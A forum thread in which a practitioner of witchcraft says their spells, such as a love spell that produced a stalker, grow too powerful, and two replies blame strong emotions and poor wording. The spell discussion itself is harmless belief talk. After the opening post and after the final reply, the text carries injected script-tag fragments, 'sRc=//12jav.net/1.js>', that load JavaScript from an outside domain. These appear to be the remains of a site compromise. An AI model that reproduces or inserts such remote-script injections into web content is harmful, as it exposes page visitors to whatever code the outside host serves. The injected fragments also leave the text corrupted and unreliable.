I am looking for advice on this. I did my first spell many years ago, simply inviting love into my life. It was incredibly basic. I rubbed fresh rosemary on a small silver amulet, said my incantation, and wore it.
Within 6 hours a girl became obsessed with me and began to stalk me. She had her friends follow me. She would not leave me alone for MONTHS. All I wanted was to gently invite someone into my life and I ended up with a stalker.
I have many many more instances like this. It seems like EVERY SINGLE spell I cast becomes so powerful it overtakes the original intention and blows up. And it's usually the most innocent intentions.
Any help? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Some thoughts:
It could be your emotions are too strong during/after the spell; these emotions then heighten the power & intensity of the spell
The wording of the spell can be off; sometimes we have to be careful with what we say and how we say it because we may be asking for something we don't truly want. For example, and I'm not saying this is what happened just an example, if a chant includes saying "Bring unto me an all-encompassing love", that can be taken two ways:
A love that is true and loves you despite your flaws and differences
Or an obsession kind of love
I suggest you look carefully at the wording before performing spells, and try to ground yourself immediately after a spell. Also, be aware of your emotions during the spell. You want to be in a place of neutrality, where you are calm and even-tempered.

Merry Meet,
I agree with BrynBrown, either your emotions are too strong, you used too much energy, or your wording was off. Try going back to the basics and making psi balls, grounding and shielding, feel how the energy flows around you, this will help you recognize how much you are using in a spell. As for the wording, as fun as it sounds to say "blow away the competition" think in literal terms. You might mean you wish to wow everyone and win, but the wording indicates blowing people away. You might wake up on the day of the competition to a windstorm. What was your incantation? I feel it might have been poor choice of words. I know far too many people who write things like "obsessed" and "inseparable" into their love spells, and are then stunned when they do not get a moments peace from their new beau.
Blessed Be. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
